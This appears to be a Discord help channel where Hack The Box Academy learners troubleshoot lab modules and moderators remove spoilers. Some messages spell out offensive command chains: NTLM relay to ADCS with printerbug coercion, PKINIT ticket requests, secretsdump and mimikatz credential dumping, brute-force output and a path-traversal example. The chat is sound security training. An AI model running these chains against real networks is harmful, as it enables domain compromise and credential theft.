#modules
it is one of those right?
but it is a problem on the machine
I cannot tell you, the module is above tier 0. Please don't post spoiler content :))))))))
oh okay :))))))))
so should I wait until you buy a new servers or what?
I don't mind you know
I can pay for that myself
after 10 attempts. Once the OTP token has been reset, you must send the OTP brute force request immediately, otherwise you will remain blocked 🙁
[STATUS] 32.00 tries/min, 32 tries in 00:01h, 2954 to do in 01:33h, 16 active
nice 1:hours
1:30
after 2 minutes it will be 3000 hours
I'm not staff lol so idk about "buying new servers"
Also don't take the estimate as a pure fact
Also, why aren't you doing localhost
That's another part of your problem. You're attacking the public facing ftp server, which is locked down to hell and back
You're meant to attack the INTERNAL localhost
Yes, there's a difference because they're containerized
like attack me or something?
I should attack from my local machine? is that what you are trying to say??
you already told me that I can't
when I got into ssh they already have a password list
I am using that
why should I use the one from part 1 section when they already give me a new one in part 2
and it is not about the list it is about the server
hello mam
Friend
The module teaches you this exact thing
Don't attack the public ip, attack localhost/127.0.0.1
when I got into ssh I ran netstat to look for ftp open and did not find it
so you don't need a new server?
but it was also kind of slow
I still don't mind paying for that
It's there
Hi, not sure if this is the right place, but I'm having an issue with xfreerdp on the Pivoting Module Assessment, where someone else is trying to connect, and we keep kicking each other off every time we connect. Is there anything I can do to avoid this? I don't want to kick off the other person in case they are in the middle of something. Thanks!
Can you try restarting your instance? Maybe they’re just connecting to the wrong ip
It's probably your session. Academy module challenges are not a shared environment.
Restarted the instance, got back into rdp all fine, so that's all good. thank you.
Not sure i quite understand. if someone else is accessing the same machine, is that not a shared environment?
Right, but it's not a shared environment. No one else was accessing it.
we left notes to each other asking if someone else was in here 😅
or am i not understanding the terminology? (excuse the noob question)
Maybe someone had the IP wrong and was trying to connect to the others env
I’ve seen it before, people mistyping an IP
Gave @low girder a headache
It's possible
I connected my ligolo agent to someone else's proxy listener the other day
It happens
hi guys, for the LLM Output Attacks skills assessment, the web app keeps crashing. I've only started on the imagebot. I've figured it's a ||sql injection|| vulnerability, but any attempt crashes the web app. I've restarted 5 times. Am I going down a rabbit hole? (maybe it's trying to tell me this attack isn't the way in)
Hi everyone!
I’m currently working on the Advanced XSS and CSRF Exploitation Skills Assessment and I’ve hit a bit of a roadblock. I’ve tried several variations of the example payload from the module to identify the ||SQLi|| point, but I either receive no response or the ||API ||returns:
||{"error":"Something went wrong"}||
Has anyone encountered this or found an approach that works? Any hints or guidance would be greatly appreciated!
Anyone able to help me out with "Attacking Domain Trusts from Linux"? I managed to perform the ExtraSids attack but not sure how to go about obtaining the NTLM hash for bross
so the extra SID attack should be forging a Golden Ticket in Kerberos. do you get the .ccache file as a result? from there you should be able to use the ticket and auth over kerberos.
Yea I get dropped into nt authority\system on the parent dc, but I don't really know how to get the NTLM hash for a specific domain user from here
none of the tools i've been working with in the modules are available and I can't use vssadmin either to make a copy of NTDS.dit
So the ticket itself isn't the problem but capturing the ntlm hash is
I didn't keep heaps good notes but don't you just use secretsdump since you have admin creds in the dev subdomain?
you can dm me 🙂
Well yea I used secretsdump to dcsync to get the child domain's krbtgt hash for the golden ticket
but I can't use secretsdump on the parent domain
you don't need to
Well how am I going to get the NTLM hash for "bross" then?
that's what I'm struggling with
you don't need it
I do xd
Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
you don't need the hash of bross to compromise the domain, you get the hash by compromising the domain
scrolls back up to the subtitle extrasids attack - linux
and it will give you the requirements to compromise the parent domain
then you use secretsdump to dump the hash of bross
when you do the extrasids attack you construct a golden ticket, which gives you domain admin in the parent domain
Yea, I did that, but how do I use secretsdump to dump the NTLM hash if I don't have a password?
I tried using -k -no-pass but can't get it to work
then you are doing something wrong
I can connect to the parent domain using psexec though
i am in the wrong module 
i saw extrasids and went to the trust attacks
which is annoying because it's the same steps
possibly upload mimikatz and run that?
Yea that was going to be my next step, but I just feel like I am missing something because that's not really the point of the module I feel like
sometimes the questions will go a little beyond the instructions of the page
keeps you thinking
fair enough
|| yes, printer.py will work after that ||
Hey guys, I'm currently on module https://academy.hackthebox.com/module/67/section/631 there, after logging in via RDP I couldn't navigate to gpedit.msc! xd
Anyone done the new wifi modules ?
Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>) ...
can anyone help me with module Cracking Password / Spraying, stuffing and defaults?
i found the flag, but the question is Password and username.. very complicated.
Hey guys, I'm currently working on the footprinting, I hit a road block on the DNS server enum last question, please help, I can't seem to find the required host
in the Attacking Common Applications module, Splunk section, the Splunk instance appears to be inaccessible (Empty reply from server). Has anyone else encountered this?
The other application on the same host works fine.
Hi, what do you mean it "crashes the web app"? If you are still stuck feel free to DM me 🙂
Anyone i can ask 2 silly stuff about Wi-Fi Penetration Testing Tools and Techniques SA's ??
incident handling process module cannot access the hive
both on pwnbox and on my pc via vpn
any help pls ? i cannot progress since it has a flag
I'm still having this issue. Is bypassing the Splunk module the way to go?
Command Injection Module
Skills Assessment Section
https://academy.hackthebox.com/module/109/section/1042
I don't want to be too specific and give out too much but what I don't understand is why the application works as expected when you make some legitimate operations to the files but the character filtering activates when you make a specific legitimate operation that in theory shouldn't cause the filter to activate. I think I'm imagining the underlying bash command correctly and it probably contains a specific filtered character but I'd love to know if I'm right about it. Happy to discuss privately if someone else wants to DM me. I've found the injection point of the application that is vulnerable and I've solved the challenge but it would be nice if someone else could confirm my suspicions.
Good day, everyone! Please I need a hint for the SQL Injection Fundamentals - Skills Assessment. I have tried different payloads for the first question (What is the password hash for the user 'admin'?) for quite 2 days and did not yield any fruitful result! Please any pointer would really help!
can anyone help me with this question? I tried to do "dig axfr @10.129.42.195 inlanefreight.htb" and the opposite but it didn't work
I think I didn't understand it well
Information Gathering - Web Edition Module
DNS zone transfer section
I'm not sure what's in the exam, but if you planned to password spray, enumeration can help determine what you might come up with, i.e., if you enumerated shares and found a document with a password, but it didn't work when you tested it across users. You could use that as a baseline word to come up with some words to spray. I'd also note the passwords and variations from the password spraying section as they are considered common, so those could also be used as a baseline. Also, since your post has spoiler content for a module above Tier 0, I am going to delete it.
Can anyone help?
Please this one!
Can u help me since u passed information gathering web edition?
Which section is that?
DNS zone transfer
DM me!
Ok
Can you register an account?
I was not able to! It would always say that the invitation code is invalid!
I'd start there
Okay! Using Burp Intruder?
Using the techniques taught in the module.
You can also reference the provided cheatsheet.
Okay! Let me give it a try ASAP! Thanks!
Do not post content above Tier 0 and do not post content with passwords. Ask your question or explain your issue as best as you can without spoiling information.
I have the same issue. Really cool module but yea should come with a disclaimer that this is going to devour your computer
I feel the invitation code validation is being done by raw PHP. Up to now I could not pass through!
file transfer windows section - access denied error
i tried base64 encode decode method
so I did this by section by ||creating ftp server and running ftp client from rdp instance||
but can't I simply ||connect to ftp server running on the rdp instance||?
yes thank you mister Rick
people should understand that
so just login to that page? that's it? in a browser?
Bro, you're a module ahead, if possible, can you help me
guys in the javascript deobfuscation
when you deobfuscate the js code you will find the flag but when I put in the flag it is not working
my best guess is you worked ahead of where it wanted you to
what's the actual section?
Deobfuscation
Using what you learned in this section, try to deobfuscate 'secret.js' in order to get the content of the flag. What is the flag?
the flag should be HTB{1_4...0r!} (not posting the full flag for obvious reasons)
yeah i found it like this
but it does not work
make sure there's no extra whitespace then
there should be no spaces or '+' characters
ok
Hopefully I'm not bugging you all too much 🙁 Getting ready for the cpts exam soon!
I was working on a module for password attacks and was able to pivot to the first host, but after escalating to root it seems like I can't use sudo?
error in /etc/sudo.conf, so the system is broken or maybe it is a fake root because of the HTB infrastructure, but I was going to try and pivot further with tools like responder/ntlm relay/tcpdump
What’s up? DM
sudo isn't always the way forward. sometimes credentials can be hanging out
none of what is required after root requires sudo as an fyi ¯_(ツ)_/¯
but if all else fails just reset the box, change vpn regions, reach out to support on the website
I finally did it, the blue modules were easy but so annoying
good luck on the exam
Yes. || Follow the exact endpoint then login then run the printerbug.py ||
too busy with college rn, will probably have to do it some other time
I figured out the next step, thanks. Definitely need to refine my notes and work on credential enumeration. My weakest skill by far.
Does anyone know how to convert a VIP subscription to a VIP+ subscription, and whether this will affect my Academy "cubes"? I can't find any info on this in the Help or FAQ sections, and the support system is now some kind of AI, "Hive Mind", that's been telling me that converting my subscription has something to do with "cubes", although I can't seem to find any information on that anywhere. It says: You can upgrade from VIP to VIP+ through your Billing & Plans section. Since your VIP subscription expires in June 2026, you'll pay a prorated amount for the upgrade and receive the equivalent prorated cubes. When your subscription renews for a full billing cycle, you'll get the complete VIP+ cube allocation.
Vip is no longer offered, and I believe all vip were upgraded to + at no extra charge when it happened. But VIP/VIP+ isn't an academy thing. You'll need to wait for a support person to respond. It has 0 to do with cubes
Has anyone finished the Attacking AI - Application and System -> Rogue Actions activity? I am having trouble getting to the flag and could use a tip
hey did you end up figuring this out?
hi is anyone available for DM regarding the Windows Event Logs and Finding Evil module?
I have had a lot of trouble with the second section for like a week now
I'm confident I identified the hash they told me to identify but it's not accepting it as an answer
so I must be doing something wrong when I run the malicious program
because that would explain me having the wrong hash even when I go to the exact event log
in the exact folder
with the exact filename they told me
||AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95 is the SHA256 hash I found but this hash is not accepted as the answer||
I'll have a look rn
ok thanks
I'm 99% sure that's the right hash
if not I probably did something wrong with the executable
but that's the exact hash I found when following the exact instructions
Not the right hashes.
Oh that thing.
With the damn spoolsv.
Try to reset the machine.
I did it after like..3 resets.
The spoolsv itself wasn't compromised the first 2.
DMs.
ok
any help with the privesc in the "Intro to C2 Operations with Sliver" module??
the entire password module is supposed to take 8 hours but it takes that long just to do the assessment lmao
DM
https://academy.hackthebox.com/module/58/section/526
for case5
ok could someone please assist in why the sqlmap is always giving a different result for the flag?
also how can you tell its using ||MYSQL|| as the database???
you can DM me if you still need help
Hi everyone, can anyone help me with the Password Attacks module (section: Spraying, Stuffing, and Defaults)?
I'm a bit lost on finding the correct password. I've managed to access the machine and found a flag.txt inside a folder, but I'm not sure what to do with it or if it's the actual answer.
I also found two other users and a Notes.zip file. I tried using some tools (fcrackzip, john) to crack the zip password, but I haven't been successful yet. I believe the answer/password I need is inside that zip file.
Has anyone faced this or have any tips on how to proceed with the zip? Thanks!"
Tip: If you want to sound more technical and direct, you can use this shorter version:
"Stuck on Password Attacks - Spraying, Stuffing, and Defaults.
I have SSH access and found Notes.zip in a user's document folder, but I can't crack it. I also found a flag in ~/smb but it doesn't work for MySQL.
I suspect the next step is inside the zip file. Any nudges on how to open it? My tools are failing to crack it."
yeh, I just did whatever looked interesting 😂 , but highly recommend completing pivoting ASAP. Spent a solid week just on that section and it has helped with everything else.
hi, did you manage to fix this "aborted, xterm test session failed"?
in case anyone trying fluxion is encountering the "aborted, xterm test session failed"
try the command in this github issue https://github.com/FluxionNetwork/fluxion/issues/221#issuecomment-1326014139
in the password attacks - pass the certificate module I've exported the cache to temp and while viewing the ntlm hash this happens, any idea why?
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
i tried to enumerate different templates via certipy against the DC but that didn't work too..
something is wrong with your ticket, do echo $KRB5CCNAME and make sure the .ccache file is in the same absolute path, or relative path from where you're running the command
it is on the temp/ccache yeah
also, does -dc-ip match the dns entry for DC01.INLANEFREIGHT.LOCAL in your /etc/hosts?
can someone help me in broken authentication module please
I am brute forcing for hour
oh shit
didn't read the module
i thought for this we didn't want to configure etc/hosts ok will do that
what do you mean
means people do it all the time
what user is your kerberos ticket for
Administrator
grep -P '^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9]).{10,}$' rockyou.txt > filtered.txt
can I do this and use it?
did you use AI to generate it
nope refered the htb academy commands
of course yes
that question wasn't at you, my notes on the module you're doing are long gone
do you think I am a magician
sht
have another look at it
just type impacket-secretsdump and have a look at the command structure
I'm still not talking to you???
I'll give you the walkthrough: first I tried to get all the templates via certipy (didn't work) so went to use ntlmrelay + printer bug, got the /DC01$.pfx then used gettgtpkinit.py to get the tgt, exported with "export KRB5CCNAME=/tmp/dc.ccache" then the last command I've pasted above
okay I'm confused because you told me your ticket is for administrator
I tried administrator password did not work
still not talking to you
yep
not you but him
your ticket is for the machine account?
yes yes
ffoouuuunnnddd theee passworddddddd
lettsss gogoopooooooooooooooooo
see
AI is good
I wonder if it is going to be as good as this in the exam
impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication then
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12
got the ticket saved
then this python3 gettgtpkinit.py -cert-pfx ../krbrelayx/DC01$.pfx -dc-ip 10.129.234.109 'inlanefreight.local/dc01$' /tmp/dc.ccache
then export KRB5CCNAME=/tmp/dc.ccache and finally the secret dump
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
did you add the DC to your /etc/hosts?
the FQDN?
kerberos is really funny about DNS
Try to do this with another tool
nope lol
echo "10.129.234.174 DC01.INLANEFREIGHT.LOCAL dc01" | sudo tee -a /etc/hosts
wait
that's not the right IP
what does DC stand for?
whatever the IP is
do i also need to create the krb5.conf file?
direct current?
you shouldn't need it in this case
I study it in physics
got it
that did it?
no my machine expired now i have to restart, sigh
on a scale of 1-10 then a scale like impossible how hard was cape?
depends how prepared you are, how well you understand the techniques, and how good your enumeration is, i have seen a lot of people struggle but i didn't have too hard of a time
some of it was finicky and annoying
and some was just jumping through hoops
there are a couple of very difficult flags
but the course is very narrow in scope so as long as you understand the subject you'll do fine
i haven't done crte, so i can't really say
i see
Hello, I'm on the Exploiting Web Vulnerabilities in Thick-Client Applications module from Attacking Common Applications.
I have an issue on this module. I'm following the writeups from the course, plus the fatty write ups from 0xdf. But I can't log in on the application. I have modified the port to 1337, removed the signing and added the domain in my /etc/host, and I still can't connect.
I don't know if I'm putting the good ip inside /etc/host. Can someone help me pls
Moreover in the write up, port 1337 is open but it is not on the target from the module
Hey, i'm stuck on ntlm relay attacks skills assessment second question, been there for a while and would appreciate any hint for it.
Different question as I'm doing the exact same thing. Did you get any username using ||smtp-user-enum||? Nothing is popping up on me using ||user.list|| from the module resources
Thanks fam.
yo guys
I'm trying to install bashfuscator
I'm on command injection module
but i don't get /bin folder which should contain the binary after installing
```
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
```
```
Python 3.10.12
```
their github says python 3.6+ is required but i can't install it for some reason
wait a second
3.10 > 3.6 
so that's not the problem
```
└─$ python3 setup.py install --user
running install
/home/haji/.local/lib/python3.10/site-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
warnings.warn(
/home/haji/.local/lib/python3.10/site-packages/setuptools/command/easy_install.py:144: EasyInstallDeprecationWarning: easy_install command is deprecated. Use build and pip and other standards-based tools.
warnings.warn(
running bdist_egg
running egg_info
writing bashfuscator.egg-info/PKG-INFO
writing dependency_links to bashfuscator.egg-info/dependency_links.txt
writing requirements to bashfuscator.egg-info/requires.txt
writing top-level names to bashfuscator.egg-info/top_level.txt
reading manifest file 'bashfuscator.egg-info/SOURCES.txt'
adding license file 'LICENSE'
writing manifest file 'bashfuscator.egg-info/SOURCES.txt'
installing library code to build/bdist.linux-x86_64/egg
running install_lib
installing scripts to build/bdist.linux-x86_64/egg/EGG-INFO/scripts
running install_scripts
running build_scripts
error: file '/home/haji/cybersec/tools/Bashfuscator/bashfuscator/bin/bashfuscator' does not exist
```
not sure what is wrong
Hi, were you able to figure out the Rogue Actions Skill Assessment Question? I could use some tips
Does the Bash Scripting Module require knowledge of BASH beforehand? I don't think it's comprehensive enough for the tasks it gives you.
everything you need to know is included in the module iirc
Nevermind I got it, if any1 is having trouble with AI Attacking Application and System - Rogue Actions in the future and wants a tip let me know
needle in the haystack challenges tho 
I have no clue, any ideas. I'm stuck on it and can't complete the module until this works.
And my script is literally the same one as in the solution. been pulling my hair out
- Are you sure it's the same
- The module is Tier 1, don't share code or anything from the module please.
Pretty sure it is. Unless there's something hidden not actually visible.
i just redid the exercise and it's working as intended. DM me what your loop/var assignment looks like and i'll sanity check ya
Okay.
One min
Could anyone provide some guidance on how to solve the question in the Cloud Storage section of the module 'OSINT: Corporate Recon'?
I am completely lost. For starters it is not very clear which website they are talking about. And I have searched for buckets on the one site that the module has previously used in every question. But that website seems to contain no buckets at all.
Guys I'm so damn confused
I need help
the first question in this module, I did all the things, but it says my answer to the first question is wrong but i have no clue what else it could be
did you ssh into the target before finding the file?
yes
can you DM me the file you found?
yep one sec
resolved
hey, does anyone know what's up with the windows VM for active directory enumeration and attacks module?
it seems like the password given is incorrect...
it has been an issue for the whole module for me, not helping my learning experience 🙁
I don't recall a wrong password. You're probably doing something wrong. Can you provide more context into the issue you're having? Like the section, question, what command you're using maybe if it doesn't spoil anything
I was doing a section and it was taking a week to solve the first question of the section so yesterday I looked at a walk through of it. Will that negatively impact my being able to understand the rest of the module? I got help with the section and I was told to google the question because of how hard the question was.
How much will the walkthrough of the one section set me back. It was the second section of Windows Event Logs and Finding Evil module.
Hello
Is anybody here to help me? I got stuck in Linux Fundamentals. The password that was given by HTB is present in the my_credential file. When I tried to connect over ssh with this command: ssh htb-student@targetip, and then they asked for my password, they said permission denied
plz somebody help me
i got stuck for 3 days 😫
i don't believe the password is in a file, but it shows you next to the username
bro username also present in this file
nope that's probably for pwnbox, the username and password for the module challenge and to remote into the victim machines is going to be where you spawn the box, but not all modules have victim boxes which is why i said you need to also say the section just not the module
bro i am in a linux fundamentals in system information sections 30 page 6 system information
yep, it's exactly as i said
right where you spawn the target it provides the username and password
Hi Everyone, I am new to HTB and Cybersecurity. I have been studying this topic for about 4-5 months now. Recently passed my CompTIA Security+ exam. I am now studying Network+ to learn networking and I am now using THM and HTB to build hands on experience and create my own labs. I am currently doing linux fundamentals on academy. I was wondering where should I pivot to next after this. Should I just decide on a path or explore other modules like windows fundamentals, nmap, ad etc. My end goal is to get into penetration testing however I know that's a long term goal. I would like to build the skills necessary to get in at entry level and work my way up. Thank you to anyone who takes the time to respond to this!
It also overturned the ground sloth phylogenetic tree that had previously been built on morphology. This study indicates that two-toed sloths and Mylodon are close relatives
i have tried multiple workarounds that just result in incorrect password
I wasn't replying to you, but for this one, it looks like this is an AD module based on the password provided. Assuming that's true, your issue is you're prefixing the username with the machine name which would make it attempt to log in with a local account. Instead you want to log in with a domain account.
Thank you, works now.
Hi all, for skill assessment for documentation and reporting, I discovered the user that has backup operators permission on the domain.
however I tried abusing via robocopy but couldn't. whoami /priv does not show the backup privilege.
How can I abuse this?
I have finished the skill assessment, I just want to know how this can be abused.
It's covered in Windows Privilege Escalation module, the Windows Built-in Groups section
You are right. However, I was unable to RDP into DC as the backup operator user to abuse that. I tried abusing from a different host as the backup user but got access denied. what did I miss?
I don't recall exactly. I bet there's a way though, maybe not RDP but something else.
Guys I have a few questions regarding privs..
I am doing htb windows priv esc module. My user is already a local admin then why are we learning using this account if we are already local admin and why can't I connect to machine using psexec or winrm, it shows error. And when I run whoami privs as a non elevated shell I don't see my privs but when I run it as admin I see. What's the role of privs if I can run as local admin?
Network is unreachable
Yeah, I’m using UK free vpn, tried US too tho. Any idea how to fix?
If I remember correctly, the free versions of PwnBox do not have Internet access. In this case, it is best to use your own VM with VPN.
Ah, thanks for letting me know just wanted to be sure it wasn’t any actual issue. Ill probably buy the vip version then
Local admins aren't always domain admins so you gotta learn how to pivot towards a domain account and sometimes this means going to another user. As for psexec or winrmexec see above, usually only domain admins have those perms, not local admins. Essentially your query boils down to the separation of privileges of a local admin from a domain admin. Also read up about process tokens which explain the shell privileges.
Thanks I think that solves my query. I will learn the difference between the 2
But what if my user is not local admin but has some good privs so how can I bypass filtered tokens to use those privs?
Okky
Hello, in Attacking Common Applications / Attacking Thick Client Applications, powershell itself is not working with an error The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.. Is this expected? I'm unable to proceed with the module.
basically I'm unable to generate the binary I'm supposed to be analyzing, because it's supposed to be generated using a powershell script.
I have a confusion in the active directory module,
Where is this Linux attack machine actually located? inside the target network, correct?
but when I connect the hackthebox vpn, how can I ssh into the linux machine, it's a private ip address... is the hackthebox network that I'm connected to via vpn is also connected to the target's network somehow?
💋 that's for you
and also
- ssh htb-student@______
ssh: connect to host _____ port 22: Connection timed out
why does that happen?
did you connect to the vpn
yeah
I did do a reconnection and that problem worked
thanks
do you know the answer to my other question?
I have a confusion in the active directory module,
Where is this Linux attack machine actually located? inside the target network, correct?
but when I connect the hackthebox vpn, how can I ssh into the linux machine, it's a private ip address... is the hackthebox network that I'm connected to via vpn is also connected to the target's network somehow?
if you have the name and password you can just do
ssh username@IP
then they will ask you for the password
anyone to help me on the skill assessment on "Stack-Based Buffer Overflows on Windows x86"? I'm just having problem on one part and I don't get why/how 🙁
Windows priv esc citrix escape session the vm is too slow I mean come on fix that it's almost undoable
Hello. I am on introductions to red teaming ai. Specifically on the manipulation the model last question.
Anyone can help me with the question ?
thanks >>>
I am in windows priv esc module -> interacting with users . When I use the command shown in the course to start responder : sudo responder -wrf -v I tun0 I get error no option r exists . Please help
try removing the -r parameter then
Hello everyone. Who completed the AI Red Teamer Model? I really need help.
I am in Introduction to Red Teaming AI, Manipulating the Model. I am running the AI lab on my machine not the HTB academy pwnbox. Where is the main.py that contains the train and test split that is needed for the module?
it says in the module instructions "We will use a slightly adjusted version of that code, which you can download from the resources in this section."
Where is the resource section that contains the slightly adjusted code?
Nevermind. I found the solution 🙂
I need some help with pass the ticket from windows. I can't seem to get john's ticket. I ran:
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
dir *.kirbi
- all krbtgt are TGTs
There is no john but there is a julio and i did the pass the ticket with his account and I got the flag. But john is no where to be seen.
Who completed HTB AI red teamer model path ? I need help for that
not me
but I will try to help
since I always fool gpt I can consider my self a AI hacker
I need path answer i have uni yesterday. Teacher gave for completing if u dont it. I take F for that 🙁
how can I help you dude I did not understand you
How much of the path do you have left
50.8%
Sounds like you've left it to the last minute
I did it during 10 days. That is my best bro 🙁
I am try do my best. But that is hard for me right now.
what is it
I have task for completing AI red teamer model all of them.
Uni assignment
oh cool
He's asking for the module answers for the path
Right
You know, academic integrity
what about ?
it sounds like you'll get an F if you don't get the correct answer
so you should study
😉
No one is going to give you the answer. Best you can do is ask for hints or something. I suggest studying the material and focusing, you can do it. the material teaches everything you need to know.
No one here can help with that, you need to do it yourself.
I can
He's asking for answers for the whole path.
I don't think it's a good idea to help him cheat
it is not cheat
Oh well then. The material has all you need, so it's not "too early" for that kind of homework.
Yes it is, providing answers is cheating.
He doesn't want help he wants the answers
if I help you will not tell him right?
you know I wish I can help you but I did not do a single module in that path
they did not even tell me I am brute forcing ssh while I thought I was doing it on ftp for 5 hours
and you want to get the wwhohoooolllleeee paaattthhhhhhhhhh
Yes but i need 15 days for completed but my teacher give me 10 days for completed. i think He didn't think i am 18 and i need preparing for other lesson and task
areeeee eyyooooooooooooooooouuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
kinnnnnnddddddinnnnnggggg meeeeeeeeeeeeee
That's something you should discuss with your teacher
yes there is something I need to discuss with you
Thank God you are not my teacher. thanks
someone in the general chat told me deeznut means this balls
so does your name mean super balls?
and thank you
My handle can be defined in multiple ways, the definition is in the eyes of the beholder
wait what does that mean
your handle?
what does handle mean
does it mean the way you handle things
omg that is complicated
I am not entertaining this conversation please keep this channel on topic
Hello all. I'm on the api attacks module / unrestricted resource consumption. I know that I need a customer ID but I can't find a way to find one. What do I miss ?
I can help you
is this thing about IDOR or something?
SORRY
I can't help myself
@surreal rain @urban sage
Don't ping admins/mods over non admin/mod related stuff. They aren't here to help you with modules. You need to do modules on your own, like I said.
I am doing but i send for this talking style.
look up
I already told you multiple times no, stop asking for answers. Go do it yourself. If you get stuck you can ask for hints, no one is going to give you answers it's against the rules.
I mean..
I can give it to him again if he asks 
i dont ask answer. now i have a problem about @coarse pine . I am child and he talk me with balls
Hi all, need help with Windows Lateral Movement - SMB Section - 2nd question (the service ALG). Got a hit on the smbserver but got error ERROR_FILE_NOT_FOUND when starting the service. I double checked everything, I don't understand what's wrong. Edit: Sorry, got it 🤦
You literally said it (even as a joke), that one's on you
What VM are they referring to in the Advance SQLi module - Live Debugging Java applications section? https://academy.hackthebox.com/module/188/section/1995
Once all of this prepared, we will connect to the VM using SSH while forwarding port 8000.
I need help. I am getting annoyed because I dont know what I am doing wrong.
I am working on whitelist uploading. This is what I have in Burp Suite
@winter glade Please take care not to post content from modules above tier 0
oh my bad. I didn't mean to post anything that could be giving things away. I just wanted to seek out some help and wanted the info to ensure I can be helped... my fault
The filter sections build off each other. I dont recall exactly where the whitelist one is in that module (though ig I dont know which module you're referring to)
I have gone back over and over with the blacklist and other ones and still cannot figure it out. I am almost done with the web penetration pathway and this has had me stumped for about 2 weeks now
This section has you deal with double extensions yeah?
correct. I have successfully uploaded the file on Burp Suite... I am using character injections to ensure it bypasses everything. From there, I do not know what to do
If its uploaded then all you need to do is visit it like you have with the other sections. As a note, nullbyte stuff is a pain in the ass (\x00) avoid it where possible
that is where I am stuck. I have tried accessing every url I can think of with the \x00 nullbytes. However, everything returns back the same: 404 Not found
@fathom pendant can I dm you some printscreens? Maybe it something so obvious that I am overlooking because I have extreme Whitelist fatigue lol
don't use those; they're a pain as i said
double extensions are the way; just gotta find the right .ph* extension to combo with and order
okay. Is there a specific extension list... the one that is provided does give me one that works. The only one that works are the nullbyte extensions
the one that was provided worked for me
hmmm... interesting the only ones that are uploading successfully are the ones with nullbytes that I am using from the site.
ah i remember how i did it now; i injected the php wordlist before and after the normal extension in separate tests 😉 so it injected filename.ph*.(image ext) in one set of tests, and filename.(image ext).ph* in the other
trying that now
LFGGGGGGGGGGGGGGGGGGGGGGGGGGGGG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! HOLY SMOKES!!! I LOVE YOU @fathom pendant
had to recall while looking at my screenshot with literally 0 notes or context LMAO. good thing I included the payload in the screenshot to jog my memory
@winter glade deleted because spoilers (i worded my response the way i did on purpose). Second, the module literally tells you about this scenario 😉
I think before I was so focused on the command injections that I overlooked that part of it. I was just super fatigued with the module question that it was something simple... that tends to happen with me quite often.. thank you
Hi all,
I am stuck on Android Application Dynamic Analysis : Bypassing Detection Mechanisms.
Kept getting Error: java.lang.ClassNotFound in Frida.
Tried to follow the steps in the solutions but it didn't work.
Hello everyone,
can anyone tell me please which labs i should solve to prepare/practice for the CJCA exam?
thanks in advance
I'm on the skill assessment for the "Hacking Wordpress" module and I am totally stuck. I'm unsure what I'm overlooking or what I don't know that I'm supposed to know. Furthermore, I'm out of wpscan API token usage for the day 😭. Could somebody maybe look over what I have to tell me if I'm overlooking something obvious, am missing required knowledge, or if something is broken? Happy to screenshare if that is easier.
I get that I can use LFI to download a file that may have a flag, but I'm not sure how to know which file that is.
Heck. I think I figured it out. Thanks @gil0x1337 from 4 months ago.
Asking for Information Gathering - Web Edition , the Final Question on Web Archives of the wikipedia.com
Although not mentioned in the module's change log, I believe the target date range has changed from March 2001 to March 2003.
I think the questions and dates differ from the previous version.
My screen still shows the answers for March 2001, and correct answer status,
so the questions have changed while the answers from the previous problems remain entered. This makes it impossible to verify if my answers are correct during review.
Is there no way to update my answers to match the current questions
and confirm if they are correct?
There is no way to reset the answers, no
I have all answered except for "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.". I just don't understand what this is asking.
I gave up and used the "Show Solution" feature. I hate this question so much, it's so misleading.
it's not misleading, you're just frustrated
Those things aren't mutually exclusive.
in most cases they are. Plenty of other people haven't found the question misleading otherwise it would have been addressed in #1234357888114364508
I dunno, I'm going through the discord search history and I'm not alone on that question. It's being retired so I don't think it's worth erratum, but I think it would be more helpful if the hint drove people away from LFI and towards the other 94 plugin vulnerabilities.
it's not being retired
Well is worth me making an erratum for the hint?
the hint i see says 'review the WPScan output' it doesn't specify LFI
True statement. I feel very primed for it though.
the question comes before the LFI ones
so it hadn't primed you or had you thinking about it; and since there's a separate question for LFI, it's safe to assume that you shouldn't be looking at LFI
it even explicitly tells you to look for 'unauthenticated file download'
Yeah, thats what has me thinking "Okay, so use this LFI to download some file."
and that's where you'd be wrong. Unauthenticated File Download != LFI
and again that question is coming BEFORE the questions relating to LFI
I know (I think) you are trying to be helpful and I appreciate that. I would get value from you explaining that though.
LFI -> displays the information in the webpage you're viewing so /page.php?someparam=../../../../../etc/passwd
File Download -> prompts you to download the file since it can't be viewed in the browser (not sure how curl handles it) so /page.php?someparam=SomeFileAccessibleViaParam.ext
Okay I see. That really messes with me.
you're taking advantage of a functionality to download a file with the Unauth File Download
as opposed to LFI which can lead to a lot more than just unauth file download
Based on my understanding, the thing it wants me to get isn't even a file, but a response formed from processing whats in the mysql DB. So, the nomenclature I need to adjust to here is that "file download" just means get something that the browser wants to save to disk.
such as, remote code execution
wrong, first sentence.
it is a file, I can't explain what that file exactly is without spoiling lab info
but if you examine the file in excel (import the file) or Google Sheets (same import functionality iirc) or Libre Office
Well now that I know not to bark up this 1 tree, let me go bark up the other 90 and see if I can understand.
you'll see more of what that file is, because it isn't necessarily an 'arbitrary' file. It's a file specific to the vulnerable plugin
